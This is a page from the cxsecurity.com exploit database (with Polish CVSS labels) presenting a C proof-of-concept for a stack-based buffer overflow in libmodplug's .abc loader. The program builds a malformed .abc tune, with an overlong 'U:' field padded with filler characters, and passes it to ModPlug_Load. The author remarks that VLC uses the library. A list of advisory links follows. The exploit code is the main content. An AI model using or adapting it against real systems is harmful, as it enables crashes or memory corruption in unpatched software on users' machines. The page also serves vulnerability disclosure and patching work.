libmodplug <= 0.8.8.2 .abc stack-based buffer overflow poc

2012.06.08
Credit: epiphant
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


Ogólna skala CVSS: 6.8/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

#include <libmodplug/modplug.h> #include <stdio.h> #include <string.h> /* libmodplug <= 0.8.8.2 .abc stack-based buffer overflow poc http://modplug-xmms.sourceforge.net/ by: epiphant this exploits one of many overflows in load_abc.cpp lol vlc media player uses libmodplug greets: defrost, babi, ming_wisher, emel1a, a.v., krs date: 28 april 2011 tested on: centos 5.6 */ int main(void) { char test[512] = "X: 1\nU: "; unsigned int i; i = strlen(test); while (i < 278) test[i++] = 'Q'; test[i++] = '1' + 32; test[i++] = '3'; test[i++] = '3'; test[i++] = '4'; while (i < 286) test[i++] = 'A'; test[i++] = '\n'; test[i] = '\0'; strcat(test, "T: Here Without You (Transcribed by: Bungee)\n"); strcat(test, "Z: 3 Doors Down\n"); strcat(test, "L: 1/4\n"); strcat(test, "Q: 108\n"); strcat(test, "K: C\n\n"); strcat(test, "[A,3A3/4] [E9/8z3/8] A3/8 [c9/8z3/8] [A9/8z3/8] [E3/4z3/8]\n"); i = strlen(test); ModPlug_Load(test, i); return 0; }

Referencje:

http://www.osvdb.org/72157
http://www.openwall.com/lists/oss-security/2011/05/02/19
http://www.openwall.com/lists/oss-security/2011/05/02/1
http://www.exploit-db.com/exploits/17222
http://www.debian.org/security/2012/dsa-2415
http://ubuntu.com/usn/usn-1148-1
http://secunia.com/advisories/48058
http://secunia.com/advisories/45742
http://secunia.com/advisories/44870
http://secunia.com/advisories/44695
http://secunia.com/advisories/44388
http://lists.opensuse.org/opensuse-security-announce/2011-08/msg00019.html
http://lists.fedoraproject.org/pipermail/package-announce/2011-May/060520.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top